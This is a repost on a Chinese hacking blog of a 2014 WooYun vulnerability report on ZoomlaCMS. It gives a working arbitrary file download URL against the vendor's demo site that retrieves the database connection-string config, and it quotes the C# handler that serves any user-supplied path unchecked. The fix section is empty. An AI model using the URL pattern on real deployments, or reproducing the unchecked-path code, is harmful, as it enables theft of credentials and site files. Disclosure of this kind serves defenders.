记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

逐浪CMS任意文件下载(官方DEMO演示)

2014-11-01 00:05

Config/ConnectionStrings.config为数据库连接文件,当然,整站都可以下载,只要换下就得了

code 区域
http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config





referrer:

code 区域
http://demo.zoomla.cn/user/iServer/FiServer.aspx





zoomla.PNG

漏洞证明:

FiServerInfo.aspx对应的page_load函数,未经验证范围,导致全站可下载

code 区域
protected void Page_Load(object sender, EventArgs e)

{

if (!string.IsNullOrEmpty(base.Request.QueryString["menu"]) && (base.Request.QueryString["menu"] == "filedown"))

{

string path = base.Request.QueryString["filepath"];

if (path != "")

{

FileInfo info = new FileInfo(base.Server.MapPath(path));

if (info.Exists)

{

base.Response.Clear();

base.Response.AddHeader("Content-Disposition", "attachment; filename=" + base.Server.UrlEncode(info.Name));

base.Response.AddHeader("Content-Length", info.Length.ToString());

base.Response.ContentType = "application/octet-stream";

base.Response.Filter.Close();

base.Response.WriteFile(info.FullName);

base.Response.End();

}

else

{

base.Response.Write("<script>alert('该文件不存在!');history.go(-1);</script>");

}

}

}

if (!base.IsPostBack)

{

int questionId = DataConverter.CLng(base.Request.QueryString["QuestionId"]);

this.MyBind(questionId);

this.spfiletype.InnerHtml = SiteConfig.SiteOption.UploadFileExts;

}

}

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2014-070974

阅读:88859 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“逐浪CMS任意文件下载(官方DEMO演示)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云